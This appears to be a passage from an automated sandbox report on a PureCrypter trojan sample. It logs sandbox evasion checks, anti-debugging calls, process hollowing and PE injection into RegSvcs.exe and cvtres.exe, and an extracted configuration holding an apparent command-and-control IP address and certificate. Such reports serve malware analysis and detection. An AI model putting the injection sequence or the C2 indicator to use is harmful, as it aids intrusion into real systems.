Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 38313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 38188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 38063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 37953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 37844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 37719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 37610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 37485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 37360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 37235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 37110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 36985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 36860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 36735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 36610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 36485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 36360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 36235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 36110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 35985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 35860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 35735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 35610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 35485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 35360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 35235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 35110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 34985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 34860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 34735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 34610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 34485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 34360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 34238	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 34110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 33985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 33860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 33735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: explorer.exe, 0000000F.00000003.2829162566.0000000008EE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: explorer.exe, 0000000F.00000003.2790446413.0000000008DD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&00000
Source: explorer.exe, 0000000F.00000003.2820279102.0000000008E0A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000F.00000003.2824164950.0000000008EAA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD001.00
Source: explorer.exe, 0000000F.00000003.2829162566.0000000008EE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000F.00000003.2824164950.0000000008EFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}pDat
Source: explorer.exe, 0000000F.00000003.2790446413.0000000008DD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:<`
Source: explorer.exe, 0000000F.00000003.2790147054.00000000070AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000000F.00000002.3954789954.0000000008D35000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 0000000F.00000003.2978176690.0000000008EE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: svchost.exe:combase_combase_rpcss_rpcss_rpcss_rpcss_rpcss_rpcss_rpcss_rpcss_rpcss_rpcss_rpcss_RPCRT4_RPCRT4_f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Mft
Source: explorer.exe, 0000000F.00000002.3954789954.0000000008CF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}9D`
Source: RegSvcs.exe, 00000003.00000002.3928894412.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3928894412.0000000001148000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.3951837463.0000023EBA657000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.3936254286.0000023EB4E40000.00000004.00000020.00020000.00000000.sdmp, pingsender.exe, 0000002A.00000002.3700931360.000001DBB6161000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000F.00000003.2790147054.00000000070AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\K
Source: explorer.exe, 0000000F.00000003.2829162566.0000000008EE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000000F.00000003.2790147054.00000000070AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}im
Source: explorer.exe, 0000000F.00000003.2824164950.0000000008EAA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD001.005
Source: explorer.exe, 0000000F.00000002.3925351931.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000
Source: explorer.exe, 0000000F.00000003.2829162566.0000000008EE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\K
Source: explorer.exe, 0000000F.00000003.2820247310.0000000008E6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: RegSvcs.exe, 0000000B.00000002.3928445625.0000000000DD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 0000000F.00000003.2820279102.0000000008E0A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000Wb@v
Source: explorer.exe, 0000000F.00000003.2790446413.0000000008DD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000F.00000002.3954789954.0000000008DAF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000000F.00000002.3940177272.00000000070AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}5
Source: explorer.exe, 0000000F.00000003.2981764970.0000000008EA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000F.00000003.2829544678.0000000008F3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000F.00000003.2829162566.0000000008EE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\1
Source: explorer.exe, 0000000F.00000003.2824164950.0000000008EFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C:\W]
Source: explorer.exe, 0000000F.00000003.2829162566.0000000008EE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _vmware_sata
Source: explorer.exe, 0000000F.00000002.3925351931.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000`
Source: explorer.exe, 0000000F.00000003.2824164950.0000000008EFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000000F.00000003.2793818708.0000000008D50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NXTtuvwVMWare
Source: explorer.exe, 0000000F.00000003.2824164950.0000000008EFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\ter.
Source: explorer.exe, 0000000F.00000003.2824164950.0000000008EFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\s.dll
Source: explorer.exe, 0000000F.00000003.2824164950.0000000008EFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}7e\
Source: explorer.exe, 0000000F.00000003.2790446413.0000000008DD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: explorer.exe, 0000000F.00000003.2820279102.0000000008E0A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}i.dllH
Source: explorer.exe, 0000000F.00000003.2822296821.0000000008EFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000F.00000003.2824164950.0000000008EFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000F.00000002.3954789954.0000000008CF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000c
Source: explorer.exe, 0000000F.00000003.2779152715.0000000007084000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%6
Source: svchost.exe, 00000010.00000002.3936100170.0000023EB4E2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: explorer.exe, 0000000F.00000003.2822565949.0000000008F0F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000F.00000002.3954789954.0000000008CF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 0000000F.00000002.3954789954.0000000008CF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000F.00000003.2824164950.0000000008EFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Program Files\Mozilla Firefox\firefox.exe

Code function: 36_2_000002163BAA89F7 rdtsc

36_2_000002163BAA89F7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_0042A2F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_0042A2F5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00436142 mov eax, dword ptr fs:[00000030h]		3_2_00436142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042DCB0 mov eax, dword ptr fs:[00000030h]		3_2_0042DCB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_00440642 GetProcessHeap,

3_2_00440642

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042A2F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0042A2F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042A458 SetUnhandledExceptionFilter,	3_2_0042A458
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042ECBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0042ECBD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00429A08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00429A08

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_00408070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,

3_2_00408070

Detected PureCrypter Trojan

Source: RegSvcs.exe, 0000000B.00000002.3946822654.0000000002A83000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: 92.255.85.34MIIE3jCCAsagAwIBAgIQAKtAMHvDWN6gdHGUDgHRjTANBgkqhkiG9w0BAQ0FADAQMQ4wDAYDVQQDDAVEdmhmdzAgFw0yNDExMTgwODQ1MDdaGA85OTk5MTIzMTIzNTk1OVowEDEOMAwGA1UEAwwFRHZoZncwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDPpaoj/b6y5df9nN4ubjCrUpmY75QQZF1Eh3SZlSMCY/o//+5tmQbQEKWRmepsPCZ0orbPI+bVSo3ApyFf7CuVmJCDceZU+CPKxuQNgO8QfoapxXoa1I+6Si3/vnDB+GCGXNQtFUKk854pnKJQ5bbulXlyH2WsKvMcH5pBmZlS1ICb899OJrlaAVnxjiWN/HM9xaLOshZjrgiQd1cViUuhgurtASI2K3DjeFX5IK3RWPVEOOi+9048f7Bzn9MvBBUajXDmgaHFECmXihSkzxgMKzES2159HFnJawCvbvVaRgfQ+Btm4evrvSnB5Md/+CowGINVPYkd5lPfzBCmvvx22+uNXSNS2etBSJq5HCA3kf/9hDKwqEk4LfctoEwrtyzxX5NNgUI64/EsyAl75Eq9uCeoncZ9gc+tkBEGKZN34WQ1AfUlbLFKceHsSzbLp8YFcFmf3DfMGZ9Dk0CXTbQbRXFQH5upFFuf9aNb3uv1UFWawhQVafSvx8m0WDMtIG+AdS82gNfnZw5S+lrX5cFh7wg/SegwpVNNkqAWZBluXrGm0MrrXrjbyJpBgyMvYwVR6EqvWblDoh4Bl0qbgVazFfg3+qKsTonmG9FDgebzD3P1nlzB4OaJZg2YxTujHHzzuYeGKqqcS9dyO00+OlmOZiqheNQw6q/JEbPGjvAveQIDAQABozIwMDAdBgNVHQ4EFgQU2XOPmnl/hX4KTm7asO54z9MKqaYwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEApCgIEW9rCvKDMwp+mh8Hl9CY0QRSQJNNU3/5upv9Rw2yHM+NRANGPBcfwqojI+c4lawnJkujyVhOTRDnpMekemYKuRoYpmTTVlWM+5XUYi1RpHBNSQDl/EenCt3F3KGSEukoeRTYIVt2/52yRonqEysuoorf1tM4ozwvApVbnn9YNzD4T4KTwtwU2Z3U0Ss0JCNnEnq9hGItFiLoXI36xvAk+bPej08Y4vObgz6wHA6FCuoxv+3Ks09QygCr9XneQKLKI++Z51nOa/OO3Xg/rKLaNs80UbTwf3wpjgp/FgAh0MmWnVYJsutoJE0DSbRyFqPzcTxkte7by5vv+/P2QM4kLuHmHTZfb869Yv9gWEeiSMM76Qxwv5Yd7LccJwQBZy/LdaXyuyWgyGRB2M+PeSw34IDL+5XTJ3Bxj7kWhweVDXd6DZaV6bXSUHE1Q1fAhYow6+0PdfVkfYm/w016MxobY2wOifaLkhk/Qz8lK4UC9JlXXTUn3zaNC/vNvlL9wxq6eMnXv0hLBQuaPTsSFv3dVC/hH4p6qa/BWCK8SkYUAn0LROR5DwaVlmEoc8zFuUTIkUBImBkr1g8yxnd+uhrW75g4GHfTMrLiMz5bMVY6XNkAHXJG24mymjVLcUQi0j9EbtqB7SgsM35k8IHHMYE+MRt2ZiKoPYEwDP+8dUI="Default:BAPPDATAJba5217eadeaf

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 value starts with: 4D5A	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 451000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 466000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 46D000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 46E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AB3008	Jump to behavior
